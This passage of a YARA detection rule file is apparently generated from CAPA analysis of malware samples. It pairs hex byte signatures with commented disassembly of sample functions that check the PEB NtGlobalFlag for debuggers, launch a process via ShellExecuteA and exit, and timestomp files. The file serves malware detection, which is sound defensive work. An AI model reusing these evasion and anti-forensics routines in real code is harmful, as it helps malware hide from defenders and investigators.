?? B8 01 00 00 00 EB ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 68 60 EB 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? E8 ?? ?? ?? ?? 85 C0 74 ?? B8 01 00 00 00 EB ?? 
33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x00403530@7faafc7e4a5c736ebfee6abbbc812d80 with 1 features: + - check for PEB NtGlobalFlag flag + .text:0x00403530 + .text:0x00403530 FUNC: int cdecl sub_00403530( int arg0, int arg1, ) [2 XREFS] + .text:0x00403530 + .text:0x00403530 Stack Variables: (offset from initial top of stack) + .text:0x00403530 8: int arg1 + .text:0x00403530 4: int arg0 + .text:0x00403530 -8: int local8 + .text:0x00403530 -1032: int local1032 + .text:0x00403530 -1036: int local1036 + .text:0x00403530 -2060: int local2060 + .text:0x00403530 -2064: int local2064 + .text:0x00403530 -2068: int local2068 + .text:0x00403530 -2072: int local2072 + .text:0x00403530 -2076: int local2076 + .text:0x00403530 -2080: int local2080 + .text:0x00403530 -3104: int local3104 + .text:0x00403530 -4128: int local4128 + .text:0x00403530 -5152: int local5152 + .text:0x00403530 -6176: int local6176 + .text:0x00403530 -6180: int local6180 + .text:0x00403530 -6184: int local6184 + .text:0x00403530 -6188: int local6188 + .text:0x00403530 -6192: int local6192 + .text:0x00403530 -6196: int local6196 + .text:0x00403530 -6200: int local6200 + .text:0x00403530 -6204: int local6204 + .text:0x00403530 + .text:0x00403530 55 push ebp + .text:0x00403531 8bec mov ebp,esp + .text:0x00403533 b838180000 mov eax,0x00001838 + .text:0x00403538 e833040000 call 0x00403970 ;__alloca_probe() + .text:0x0040353d 53 push ebx + .text:0x0040353e 56 push esi + .text:0x0040353f 57 push edi + .text:0x00403540 c785dce7ffff0000 mov dword [ebp - 6180],0 + .text:0x0040354a c785d8e7ffff0000 mov dword [ebp - 6184],0 + .text:0x00403554 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040355a 8a5802 mov bl,byte [eax + 2] + .text:0x0040355d 889de0e7ffff mov byte [ebp - 6176],bl + .text:0x00403563 0fbe85e0e7ffff movsx eax,byte [ebp - 6176] + .text:0x0040356a 85c0 test eax,eax + .text:0x0040356c 7405 jz 0x00403573 + .text:0x0040356e e88ddaffff call 0x00401000 ;sub_00401000() + .text:0x00403573 
loc_00403573: [1 XREFS] + .text:0x00403573 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403579 8b4018 mov eax,dword [eax + 24] + .text:0x0040357c 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x00403580 8985dce7ffff mov dword [ebp - 6180],eax + .text:0x00403586 83bddce7ffff00 cmp dword [ebp - 6180],0 + .text:0x0040358d 7405 jz 0x00403594 + .text:0x0040358f e86cdaffff call 0x00401000 ;sub_00401000() + .text:0x00403594 loc_00403594: [1 XREFS] + .text:0x00403594 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x0040359a 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040359e 83e870 sub eax,112 + .text:0x004035a1 8985d8e7ffff mov dword [ebp - 6184],eax + .text:0x004035a7 83bdd8e7ffff00 cmp dword [ebp - 6184],0 + .text:0x004035ae 7505 jnz 0x004035b5 + .text:0x004035b0 e84bdaffff call 0x00401000 ;sub_00401000() + .text:0x004035b5 loc_004035b5: [1 XREFS] + .text:0x004035b5 837d0801 cmp dword [ebp + 8],1 + .text:0x004035b9 751a jnz 0x004035d5 + .text:0x004035bb e840dbffff call 0x00401100 ;sub_00401100() + .text:0x004035c0 85c0 test eax,eax + .text:0x004035c2 7407 jz 0x004035cb + .text:0x004035c4 e877f6ffff call 0x00402c40 ;sub_00402c40() + .text:0x004035c9 eb05 jmp 0x004035d0 + .text:0x004035cb loc_004035cb: [1 XREFS] + .text:0x004035cb e830daffff call 0x00401000 ;sub_00401000() + .text:0x004035d0 loc_004035d0: [1 XREFS] + .text:0x004035d0 e959020000 jmp 0x0040382e + .text:0x004035d5 loc_004035d5: [1 XREFS] + .text:0x004035d5 8b4d08 mov ecx,dword [ebp + 8] + .text:0x004035d8 8b550c mov edx,dword [ebp + 12] + .text:0x004035db 8b448afc mov eax,dword [edx + ecx * 4 + -4] + .text:0x004035df 8945fc mov dword [ebp - 4],eax + .text:0x004035e2 8b4dfc mov ecx,dword [ebp - 4] + .text:0x004035e5 51 push ecx + .text:0x004035e6 e885f7ffff call 0x00402d70 ;sub_00402d70(0x61616161) + .text:0x004035eb 83c404 add esp,4 + .text:0x004035ee 85c0 test eax,eax + .text:0x004035f0 7505 jnz 0x004035f7 + .text:0x004035f2 e809daffff call 0x00401000 ;sub_00401000() + .text:0x004035f7 
loc_004035f7: [1 XREFS] + .text:0x004035f7 8b550c mov edx,dword [ebp + 12] + .text:0x004035fa 8b4204 mov eax,dword [edx + 4] + .text:0x004035fd 8985d4e7ffff mov dword [ebp - 6188],eax + .text:0x00403603 6870c14000 push 0x0040c170 + .text:0x00403608 8b8dd4e7ffff mov ecx,dword [ebp - 6188] + .text:0x0040360e 51 push ecx + .text:0x0040360f e8bb0c0000 call 0x004042cf ;__mbscmp(0x61616161,arg1,0x61616161) + .text:0x00403614 83c408 add esp,8 + .text:0x00403617 85c0 test eax,eax + .text:0x00403619 7564 jnz 0x0040367f + .text:0x0040361b 837d0803 cmp dword [ebp + 8],3 + .text:0x0040361f 7531 jnz 0x00403652 + .text:0x00403621 6800040000 push 1024 + .text:0x00403626 8d95fcfbffff lea edx,dword [ebp - 1028] + .text:0x0040362c 52 push edx + .text:0x0040362d e83ef8ffff call 0x00402e70 ;sub_00402e70(local1032) + .text:0x00403632 83c408 add esp,8 + .text:0x00403635 85c0 test eax,eax + .text:0x00403637 7408 jz 0x00403641 + .text:0x00403639 83c8ff or eax,0xffffffff + .text:0x0040363c e9ef010000 jmp 0x00403830 + .text:0x00403641 loc_00403641: [1 XREFS] + .text:0x00403641 8d85fcfbffff lea eax,dword [ebp - 1028] + .text:0x00403647 50 push eax + .text:0x00403648 e8f3f8ffff call 0x00402f40 ;sub_00402f40(local1032) + .text:0x0040364d 83c404 add esp,4 + .text:0x00403650 eb28 jmp 0x0040367a + .text:0x00403652 loc_00403652: [1 XREFS] + .text:0x00403652 837d0804 cmp dword [ebp + 8],4 + .text:0x00403656 751d jnz 0x00403675 + .text:0x00403658 8b4d0c mov ecx,dword [ebp + 12] + .text:0x0040365b 8b5108 mov edx,dword [ecx + 8] + .text:0x0040365e 8995f8fbffff mov dword [ebp - 1032],edx + .text:0x00403664 8b85f8fbffff mov eax,dword [ebp - 1032] + .text:0x0040366a 50 push eax + .text:0x0040366b e8d0f8ffff call 0x00402f40 ;sub_00402f40(0x61616161) + .text:0x00403670 83c404 add esp,4 + .text:0x00403673 eb05 jmp 0x0040367a + .text:0x00403675 loc_00403675: [1 XREFS] + .text:0x00403675 e886d9ffff call 0x00401000 ;sub_00401000() + .text:0x0040367a loc_0040367a: [2 XREFS] + .text:0x0040367a e9af010000 jmp 
0x0040382e + .text:0x0040367f loc_0040367f: [1 XREFS] + .text:0x0040367f 8b4d0c mov ecx,dword [ebp + 12] + .text:0x00403682 8b5104 mov edx,dword [ecx + 4] + .text:0x00403685 8995d0e7ffff mov dword [ebp - 6192],edx + .text:0x0040368b 686cc14000 push 0x0040c16c + .text:0x00403690 8b85d0e7ffff mov eax,dword [ebp - 6192] + .text:0x00403696 50 push eax + .text:0x00403697 e8330c0000 call 0x004042cf ;__mbscmp(0x61616161,0x61616161,arg1) + .text:0x0040369c 83c408 add esp,8 + .text:0x0040369f 85c0 test eax,eax + .text:0x004036a1 7564 jnz 0x00403707 + .text:0x004036a3 837d0803 cmp dword [ebp + 8],3 + .text:0x004036a7 7531 jnz 0x004036da + .text:0x004036a9 6800040000 push 1024 + .text:0x004036ae 8d8df8f7ffff lea ecx,dword [ebp - 2056] + .text:0x004036b4 51 push ecx + .text:0x004036b5 e8b6f7ffff call 0x00402e70 ;sub_00402e70(local2060) + .text:0x004036ba 83c408 add esp,8 + .text:0x004036bd 85c0 test eax,eax + .text:0x004036bf 7408 jz 0x004036c9 + .text:0x004036c1 83c8ff or eax,0xffffffff + .text:0x004036c4 e967010000 jmp 0x00403830 + .text:0x004036c9 loc_004036c9: [1 XREFS] + .text:0x004036c9 8d95f8f7ffff lea edx,dword [ebp - 2056] + .text:0x004036cf 52 push edx + .text:0x004036d0 e8ebfbffff call 0x004032c0 ;sub_004032c0(local2060) + .text:0x004036d5 83c404 add esp,4 + .text:0x004036d8 eb28 jmp 0x00403702 + .text:0x004036da loc_004036da: [1 XREFS] + .text:0x004036da 837d0804 cmp dword [ebp + 8],4 + .text:0x004036de 751d jnz 0x004036fd + .text:0x004036e0 8b450c mov eax,dword [ebp + 12] + .text:0x004036e3 8b4808 mov ecx,dword [eax + 8] + .text:0x004036e6 898df4f7ffff mov dword [ebp - 2060],ecx + .text:0x004036ec 8b95f4f7ffff mov edx,dword [ebp - 2060] + .text:0x004036f2 52 push edx + .text:0x004036f3 e8c8fbffff call 0x004032c0 ;sub_004032c0(0x61616161) + .text:0x004036f8 83c404 add esp,4 + .text:0x004036fb eb05 jmp 0x00403702 + .text:0x004036fd loc_004036fd: [1 XREFS] + .text:0x004036fd e8fed8ffff call 0x00401000 ;sub_00401000() + .text:0x00403702 loc_00403702: [2 XREFS] + 
.text:0x00403702 e927010000 jmp 0x0040382e + .text:0x00403707 loc_00403707: [1 XREFS] + .text:0x00403707 8b450c mov eax,dword [ebp + 12] + .text:0x0040370a 8b4804 mov ecx,dword [eax + 4] + .text:0x0040370d 898dcce7ffff mov dword [ebp - 6196],ecx + .text:0x00403713 6868c14000 push 0x0040c168 + .text:0x00403718 8b95cce7ffff mov edx,dword [ebp - 6196] + .text:0x0040371e 52 push edx + .text:0x0040371f e8ab0b0000 call 0x004042cf ;__mbscmp(arg1,0x61616161,0x61616161) + .text:0x00403724 83c408 add esp,8 + .text:0x00403727 85c0 test eax,eax + .text:0x00403729 7566 jnz 0x00403791 + .text:0x0040372b 837d0807 cmp dword [ebp + 8],7 + .text:0x0040372f 7556 jnz 0x00403787 + .text:0x00403731 8b450c mov eax,dword [ebp + 12] + .text:0x00403734 8b4808 mov ecx,dword [eax + 8] + .text:0x00403737 898de8f7ffff mov dword [ebp - 2072],ecx + .text:0x0040373d 8b550c mov edx,dword [ebp + 12] + .text:0x00403740 8b420c mov eax,dword [edx + 12] + .text:0x00403743 8985ecf7ffff mov dword [ebp - 2068],eax + .text:0x00403749 8b4d0c mov ecx,dword [ebp + 12] + .text:0x0040374c 8b5110 mov edx,dword [ecx + 16] + .text:0x0040374f 8995e4f7ffff mov dword [ebp - 2076],edx + .text:0x00403755 8b450c mov eax,dword [ebp + 12] + .text:0x00403758 8b4814 mov ecx,dword [eax + 20] + .text:0x0040375b 898df0f7ffff mov dword [ebp - 2064],ecx + .text:0x00403761 8b95f0f7ffff mov edx,dword [ebp - 2064] + .text:0x00403767 52 push edx + .text:0x00403768 8b85e4f7ffff mov eax,dword [ebp - 2076] + .text:0x0040376e 50 push eax + .text:0x0040376f 8b8decf7ffff mov ecx,dword [ebp - 2068] + .text:0x00403775 51 push ecx + .text:0x00403776 8b95e8f7ffff mov edx,dword [ebp - 2072] + .text:0x0040377c 52 push edx + .text:0x0040377d e84edaffff call 0x004011d0 ;sub_004011d0(0x61616161,0x61616161,0x61616161,0x61616161) + .text:0x00403782 83c410 add esp,16 + .text:0x00403785 eb05 jmp 0x0040378c + .text:0x00403787 loc_00403787: [1 XREFS] + .text:0x00403787 e874d8ffff call 0x00401000 ;sub_00401000() + .text:0x0040378c loc_0040378c: [1 XREFS] 
+ .text:0x0040378c e99d000000 jmp 0x0040382e + .text:0x00403791 loc_00403791: [1 XREFS] + .text:0x00403791 8b450c mov eax,dword [ebp + 12] + .text:0x00403794 8b4804 mov ecx,dword [eax + 4] + .text:0x00403797 898dc8e7ffff mov dword [ebp - 6200],ecx + .text:0x0040379d 6864c14000 push 0x0040c164 + .text:0x004037a2 8b95c8e7ffff mov edx,dword [ebp - 6200] + .text:0x004037a8 52 push edx + .text:0x004037a9 e8210b0000 call 0x004042cf ;__mbscmp(arg1,0x61616161,0x61616161) + .text:0x004037ae 83c408 add esp,8 + .text:0x004037b1 85c0 test eax,eax + .text:0x004037b3 7574 jnz 0x00403829 + .text:0x004037b5 837d0803 cmp dword [ebp + 8],3 + .text:0x004037b9 7567 jnz 0x00403822 + .text:0x004037bb 6800040000 push 1024 + .text:0x004037c0 8d85e4f3ffff lea eax,dword [ebp - 3100] + .text:0x004037c6 50 push eax + .text:0x004037c7 6800040000 push 1024 + .text:0x004037cc 8d8de4e7ffff lea ecx,dword [ebp - 6172] + .text:0x004037d2 51 push ecx + .text:0x004037d3 6800040000 push 1024 + .text:0x004037d8 8d95e4efffff lea edx,dword [ebp - 4124] + .text:0x004037de 52 push edx + .text:0x004037df 6800040000 push 1024 + .text:0x004037e4 8d85e4ebffff lea eax,dword [ebp - 5148] + .text:0x004037ea 50 push eax + .text:0x004037eb e8c0dcffff call 0x004014b0 ;sub_004014b0(local5152,1024,local4128,1024,local6176,1024,local3104) + .text:0x004037f0 83c420 add esp,32 + .text:0x004037f3 85c0 test eax,eax + .text:0x004037f5 7529 jnz 0x00403820 + .text:0x004037f7 8d8de4f3ffff lea ecx,dword [ebp - 3100] + .text:0x004037fd 51 push ecx + .text:0x004037fe 8d95e4e7ffff lea edx,dword [ebp - 6172] + .text:0x00403804 52 push edx + .text:0x00403805 8d85e4efffff lea eax,dword [ebp - 4124] + .text:0x0040380b 50 push eax + .text:0x0040380c 8d8de4ebffff lea ecx,dword [ebp - 5148] + .text:0x00403812 51 push ecx + .text:0x00403813 684cc14000 push 0x0040c14c + .text:0x00403818 e81c010000 call 0x00403939 ;sub_00403939(0x0040c14c,local5152) + .text:0x0040381d 83c414 add esp,20 + .text:0x00403820 loc_00403820: [1 XREFS] + 
.text:0x00403820 eb05 jmp 0x00403827 + .text:0x00403822 loc_00403822: [1 XREFS] + .text:0x00403822 e8d9d7ffff call 0x00401000 ;sub_00401000() + .text:0x00403827 loc_00403827: [1 XREFS] + .text:0x00403827 eb05 jmp 0x0040382e + .text:0x00403829 loc_00403829: [1 XREFS] + .text:0x00403829 e8d2d7ffff call 0x00401000 ;sub_00401000() + .text:0x0040382e loc_0040382e: [5 XREFS] + .text:0x0040382e 33c0 xor eax,eax + .text:0x00403830 loc_00403830: [2 XREFS] + .text:0x00403830 5f pop edi + .text:0x00403831 5e pop esi + .text:0x00403832 5b pop ebx + .text:0x00403833 8be5 mov esp,ebp + .text:0x00403835 5d pop ebp + .text:0x00403836 c3 ret + */ + $c45 = { 55 8B EC B8 38 18 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 83 7D ?? 01 75 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 44 8A ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 04 85 C0 75 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 42 ?? 89 85 ?? ?? ?? ?? 68 70 C1 40 00 8B 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 83 C8 FF E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 EB ?? 83 7D ?? 04 75 ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 68 6C C1 40 00 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? 83 C8 FF E9 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? 83 7D ?? 04 75 ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 
52 E8 ?? ?? ?? ?? 83 C4 04 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 68 68 C1 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 07 75 ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 55 ?? 8B 42 ?? 89 85 ?? ?? ?? ?? 8B 4D ?? 8B 51 ?? 89 95 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 10 EB ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 48 ?? 89 8D ?? ?? ?? ?? 68 64 C1 40 00 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 08 85 C0 75 ?? 83 7D ?? 03 75 ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 68 00 04 00 00 8D 95 ?? ?? ?? ?? 52 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 20 85 C0 75 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 68 4C C1 40 00 E8 ?? ?? ?? ?? 83 C4 14 EB ?? E8 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + condition: + all of them +} + +rule super_rule_b94af +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "b94af4a4d4af6eac81fc135abda1c40c" + strings: + /* +Basic Block at 0x00402410@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - create process on Windows + .text:0x00402410 + .text:0x00402410 FUNC: int cdecl sub_00402410( ) [14 XREFS] + .text:0x00402410 + .text:0x00402410 Stack Variables: (offset from initial top of stack) + .text:0x00402410 -264: int local264 + .text:0x00402410 -524: int local524 + .text:0x00402410 + .text:0x00402410 55 push ebp + .text:0x00402411 8bec mov ebp,esp + .text:0x00402413 81ec08020000 sub esp,520 + .text:0x00402419 53 push ebx + .text:0x0040241a 56 push esi + .text:0x0040241b 57 push edi + .text:0x0040241c 6804010000 push 260 + .text:0x00402421 8d85f8fdffff lea eax,dword [ebp - 520] + .text:0x00402427 50 push eax + .text:0x00402428 6a00 push 0 + .text:0x0040242a ff1538b04000 call dword [0x0040b038] 
;kernel32.GetModuleFileNameA(0,local524,260) + .text:0x00402430 6804010000 push 260 + .text:0x00402435 8d8df8fdffff lea ecx,dword [ebp - 520] + .text:0x0040243b 51 push ecx + .text:0x0040243c 8d95f8fdffff lea edx,dword [ebp - 520] + .text:0x00402442 52 push edx + .text:0x00402443 ff153cb04000 call dword [0x0040b03c] ;kernel32.GetShortPathNameA(local524,local524,260) + .text:0x00402449 bfdcc04000 mov edi,0x0040c0dc + .text:0x0040244e 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x00402454 83c9ff or ecx,0xffffffff + .text:0x00402457 33c0 xor eax,eax + .text:0x00402459 f2ae repnz: scasb + .text:0x0040245b f7d1 not ecx + .text:0x0040245d 2bf9 sub edi,ecx + .text:0x0040245f 8bf7 mov esi,edi + .text:0x00402461 8bc1 mov eax,ecx + .text:0x00402463 8bfa mov edi,edx + .text:0x00402465 c1e902 shr ecx,2 + .text:0x00402468 f3a5 rep: movsd + .text:0x0040246a 8bc8 mov ecx,eax + .text:0x0040246c 83e103 and ecx,3 + .text:0x0040246f f3a4 rep: movsb + .text:0x00402471 8dbdf8fdffff lea edi,dword [ebp - 520] + .text:0x00402477 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x0040247d 83c9ff or ecx,0xffffffff + .text:0x00402480 33c0 xor eax,eax + .text:0x00402482 f2ae repnz: scasb + .text:0x00402484 f7d1 not ecx + .text:0x00402486 2bf9 sub edi,ecx + .text:0x00402488 8bf7 mov esi,edi + .text:0x0040248a 8bd9 mov ebx,ecx + .text:0x0040248c 8bfa mov edi,edx + .text:0x0040248e 83c9ff or ecx,0xffffffff + .text:0x00402491 33c0 xor eax,eax + .text:0x00402493 f2ae repnz: scasb + .text:0x00402495 83c7ff add edi,0xffffffff + .text:0x00402498 8bcb mov ecx,ebx + .text:0x0040249a c1e902 shr ecx,2 + .text:0x0040249d f3a5 rep: movsd + .text:0x0040249f 8bcb mov ecx,ebx + .text:0x004024a1 83e103 and ecx,3 + .text:0x004024a4 f3a4 rep: movsb + .text:0x004024a6 bfd4c04000 mov edi,0x0040c0d4 + .text:0x004024ab 8d95fcfeffff lea edx,dword [ebp - 260] + .text:0x004024b1 83c9ff or ecx,0xffffffff + .text:0x004024b4 33c0 xor eax,eax + .text:0x004024b6 f2ae repnz: scasb + .text:0x004024b8 f7d1 not ecx + 
.text:0x004024ba 2bf9 sub edi,ecx + .text:0x004024bc 8bf7 mov esi,edi + .text:0x004024be 8bd9 mov ebx,ecx + .text:0x004024c0 8bfa mov edi,edx + .text:0x004024c2 83c9ff or ecx,0xffffffff + .text:0x004024c5 33c0 xor eax,eax + .text:0x004024c7 f2ae repnz: scasb + .text:0x004024c9 83c7ff add edi,0xffffffff + .text:0x004024cc 8bcb mov ecx,ebx + .text:0x004024ce c1e902 shr ecx,2 + .text:0x004024d1 f3a5 rep: movsd + .text:0x004024d3 8bcb mov ecx,ebx + .text:0x004024d5 83e103 and ecx,3 + .text:0x004024d8 f3a4 rep: movsb + .text:0x004024da 6a00 push 0 + .text:0x004024dc 6a00 push 0 + .text:0x004024de 8d85fcfeffff lea eax,dword [ebp - 260] + .text:0x004024e4 50 push eax + .text:0x004024e5 68ccc04000 push 0x0040c0cc + .text:0x004024ea 6a00 push 0 + .text:0x004024ec 6a00 push 0 + .text:0x004024ee ff1538b14000 call dword [0x0040b138] ;shell32.ShellExecuteA(0,0,0x0040c0cc,local264,0,0) + .text:0x004024f4 6a00 push 0 + .text:0x004024f6 e8ae080000 call 0x00402da9 ;_exit(0) + .text:0x004024fb 5f pop edi + .text:0x004024fc 5e pop esi + .text:0x004024fd 5b pop ebx + .text:0x004024fe 8be5 mov esp,ebp + .text:0x00402500 5d pop ebp + .text:0x00402501 c3 ret + */ + $c46 = { 55 8B EC 81 EC 08 02 00 00 53 56 57 68 04 01 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 68 04 01 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? BF DC C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF D4 C0 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 68 CC C0 40 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 6A 00 E8 ?? ?? ?? ?? 
5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004014e0@b94af4a4d4af6eac81fc135abda1c40c with 1 features: + - timestomp file + .text:0x004014e0 + .text:0x004014e0 FUNC: int cdecl sub_004014e0( int arg0, int arg1, ) [2 XREFS] + .text:0x004014e0 + .text:0x004014e0 Stack Variables: (offset from initial top of stack) + .text:0x004014e0 8: int arg1 + .text:0x004014e0 4: int arg0 + .text:0x004014e0 -12: int local12 + .text:0x004014e0 -20: int local20 + .text:0x004014e0 -28: int local28 + .text:0x004014e0 -32: int local32 + .text:0x004014e0 + .text:0x004014e0 55 push ebp + .text:0x004014e1 8bec mov ebp,esp + .text:0x004014e3 83ec1c sub esp,28 + .text:0x004014e6 6a00 push 0 + .text:0x004014e8 6880000000 push 128 + .text:0x004014ed 6a03 push 3 + .text:0x004014ef 6a00 push 0 + .text:0x004014f1 6a01 push 1 + .text:0x004014f3 6800000080 push 0x80000000 + .text:0x004014f8 8b450c mov eax,dword [ebp + 12] + .text:0x004014fb 50 push eax + .text:0x004014fc ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0) + .text:0x00401502 8945e4 mov dword [ebp - 28],eax + .text:0x00401505 837de400 cmp dword [ebp - 28],0 + .text:0x00401509 750a jnz 0x00401515 + .text:0x0040150b b801000000 mov eax,1 + .text:0x00401510 e98b000000 jmp 0x004015a0 + .text:0x00401515 loc_00401515: [1 XREFS] + .text:0x00401515 8d4df0 lea ecx,dword [ebp - 16] + .text:0x00401518 51 push ecx + .text:0x00401519 8d55e8 lea edx,dword [ebp - 24] + .text:0x0040151c 52 push edx + .text:0x0040151d 8d45f8 lea eax,dword [ebp - 8] + .text:0x00401520 50 push eax + .text:0x00401521 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401524 51 push ecx + .text:0x00401525 ff1558b04000 call dword [0x0040b058] ;kernel32.GetFileTime(kernel32.CreateFileA(arg1,0x80000000,1,0,3,128,0),local12,local28,local20) + .text:0x0040152b 85c0 test eax,eax + .text:0x0040152d 7511 jnz 0x00401540 + .text:0x0040152f 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401532 52 push edx + .text:0x00401533 ff1564b04000 call dword 
[0x0040b064] ;kernel32.CloseHandle(<0x004014fc>) + .text:0x00401539 b801000000 mov eax,1 + .text:0x0040153e eb60 jmp 0x004015a0 + .text:0x00401540 loc_00401540: [1 XREFS] + .text:0x00401540 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401543 50 push eax + .text:0x00401544 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x004014fc>) + .text:0x0040154a 6a00 push 0 + .text:0x0040154c 6880000000 push 128 + .text:0x00401551 6a03 push 3 + .text:0x00401553 6a00 push 0 + .text:0x00401555 6a02 push 2 + .text:0x00401557 6800000040 push 0x40000000 + .text:0x0040155c 8b4d08 mov ecx,dword [ebp + 8] + .text:0x0040155f 51 push ecx + .text:0x00401560 ff1554b04000 call dword [0x0040b054] ;kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0) + .text:0x00401566 8945e4 mov dword [ebp - 28],eax + .text:0x00401569 8d55f0 lea edx,dword [ebp - 16] + .text:0x0040156c 52 push edx + .text:0x0040156d 8d45e8 lea eax,dword [ebp - 24] + .text:0x00401570 50 push eax + .text:0x00401571 8d4df8 lea ecx,dword [ebp - 8] + .text:0x00401574 51 push ecx + .text:0x00401575 8b55e4 mov edx,dword [ebp - 28] + .text:0x00401578 52 push edx + .text:0x00401579 ff155cb04000 call dword [0x0040b05c] ;kernel32.SetFileTime(kernel32.CreateFileA(arg0,0x40000000,2,0,3,128,0),local12,local28,local20) + .text:0x0040157f 85c0 test eax,eax + .text:0x00401581 7511 jnz 0x00401594 + .text:0x00401583 8b45e4 mov eax,dword [ebp - 28] + .text:0x00401586 50 push eax + .text:0x00401587 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401560>) + .text:0x0040158d b801000000 mov eax,1 + .text:0x00401592 eb0c jmp 0x004015a0 + .text:0x00401594 loc_00401594: [1 XREFS] + .text:0x00401594 8b4de4 mov ecx,dword [ebp - 28] + .text:0x00401597 51 push ecx + .text:0x00401598 ff1564b04000 call dword [0x0040b064] ;kernel32.CloseHandle(<0x00401560>) + .text:0x0040159e 33c0 xor eax,eax + .text:0x004015a0 loc_004015a0: [3 XREFS] + .text:0x004015a0 8be5 mov esp,ebp + .text:0x004015a2 5d pop ebp + .text:0x004015a3 c3 ret + */ + 
